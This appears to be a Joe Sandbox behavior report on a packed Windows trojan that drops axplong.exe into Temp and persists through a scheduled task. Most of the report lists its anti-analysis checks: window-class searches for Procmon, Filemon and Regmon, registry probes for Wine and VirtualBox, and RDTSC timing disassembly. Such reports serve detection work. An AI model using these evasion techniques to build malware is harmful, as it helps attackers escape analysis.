File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00BE4CF0	9_2_00BE4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C23068	9_2_00C23068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00BEE440	9_2_00BEE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C17D83	9_2_00C17D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C38D70	9_2_00C38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C38D70	9_2_00C38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C38D70	9_2_00C38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C38D70	9_2_00C38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00BE4AF0	9_2_00BE4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C2765B	9_2_00C2765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C22BD0	9_2_00C22BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C2777B	9_2_00C2777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C26F09	9_2_00C26F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C28720	9_2_00C28720

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe 1DBBF81D6F4B2222B37594E8FF30672BF85FD360F347CBD20B1A5D7B841DD276

Source: 9ICG2PuZbG.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9ICG2PuZbG.exe	Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: 9ICG2PuZbG.exe	Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
Source: axplong.exe.1.dr	Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: axplong.exe.1.dr	Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 9ICG2PuZbG.exe

Virustotal: Detection: 52%

Source: 9ICG2PuZbG.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

File read: C:\Users\user\Desktop\9ICG2PuZbG.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9ICG2PuZbG.exe "C:\Users\user\Desktop\9ICG2PuZbG.exe"
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: 9ICG2PuZbG.exe

Static file information: File size 1897984 > 1048576

Source: 9ICG2PuZbG.exe

Static PE information: Raw size of pcxsfzhs is bigger than: 0x100000 < 0x19da00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Unpacked PE file: 1.2.9ICG2PuZbG.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 9.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.1.dr	Static PE information: real checksum: 0x1d101c should be: 0x1d2453
Source: 9ICG2PuZbG.exe	Static PE information: real checksum: 0x1d101c should be: 0x1d2453

Source: 9ICG2PuZbG.exe	Static PE information: section name:
Source: 9ICG2PuZbG.exe	Static PE information: section name: .idata
Source: 9ICG2PuZbG.exe	Static PE information: section name:
Source: 9ICG2PuZbG.exe	Static PE information: section name: pcxsfzhs
Source: 9ICG2PuZbG.exe	Static PE information: section name: plzfkdac
Source: 9ICG2PuZbG.exe	Static PE information: section name: .taggant
Source: axplong.exe.1.dr	Static PE information: section name:
Source: axplong.exe.1.dr	Static PE information: section name: .idata
Source: axplong.exe.1.dr	Static PE information: section name:
Source: axplong.exe.1.dr	Static PE information: section name: pcxsfzhs
Source: axplong.exe.1.dr	Static PE information: section name: plzfkdac
Source: axplong.exe.1.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 9_2_00BFD84C push ecx; ret

9_2_00BFD85F

Source: 9ICG2PuZbG.exe	Static PE information: section name: entropy: 7.977259343253602
Source: 9ICG2PuZbG.exe	Static PE information: section name: pcxsfzhs entropy: 7.95412617888117
Source: axplong.exe.1.dr	Static PE information: section name: entropy: 7.977259343253602
Source: axplong.exe.1.dr	Static PE information: section name: pcxsfzhs entropy: 7.95412617888117

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 33B3E1 second address: 33B3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 33B3E5 second address: 33B3F7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F3A9502B5ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 33B3F7 second address: 33B41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3A94CD4095h 0x0000000a jmp 00007F3A94CD4089h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 33B41C second address: 33B439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F3A9502B5ECh 0x0000000c jg 00007F3A9502B5E6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3476B7 second address: 3476D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A94CD4088h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 347B28 second address: 347B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A9502B5F4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 347CC2 second address: 347CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 347CC6 second address: 347CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 347CE4 second address: 347CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 347E86 second address: 347EA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F3A9502B5E6h 0x00000009 jmp 00007F3A9502B5EEh 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 347EA2 second address: 347EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 347EA6 second address: 347EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F3A9502B5E8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3A9502B5F5h 0x0000001b jnc 00007F3A9502B5E6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 347EEA second address: 347EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 34ABBF second address: 34ABCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3A9502B5E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 34ABCD second address: 34ABDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 34ABDE second address: 34ABFD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ecx 0x0000000e pushad 0x0000000f jmp 00007F3A9502B5EEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 34ABFD second address: 34AC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 34AC0D second address: 34AC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5F9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 34ADBF second address: 34ADC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 34AE17 second address: 34AED3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A9502B5F1h 0x00000008 jmp 00007F3A9502B5EBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007F3A9502B5F2h 0x00000017 push 00000000h 0x00000019 call 00007F3A9502B5EBh 0x0000001e sub ecx, dword ptr [ebp+122D2B52h] 0x00000024 pop ecx 0x00000025 push A3B43380h 0x0000002a jg 00007F3A9502B5F2h 0x00000030 add dword ptr [esp], 5C4BCD00h 0x00000037 push ecx 0x00000038 mov edx, esi 0x0000003a pop esi 0x0000003b push 00000003h 0x0000003d mov edx, dword ptr [ebp+122D2BB2h] 0x00000043 push 00000000h 0x00000045 movzx edx, cx 0x00000048 push 00000003h 0x0000004a call 00007F3A9502B5F0h 0x0000004f mov dword ptr [ebp+122D2EF0h], eax 0x00000055 pop ecx 0x00000056 call 00007F3A9502B5E9h 0x0000005b jmp 00007F3A9502B5F5h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F3A9502B5F5h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 34AED3 second address: 34AF21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F3A94CD4076h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F3A94CD4089h 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 jg 00007F3A94CD4076h 0x0000001f popad 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 jmp 00007F3A94CD4083h 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 35BFDE second address: 35BFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 331236 second address: 33123B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3692DA second address: 3692DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3692DE second address: 369301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3A94CD4084h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
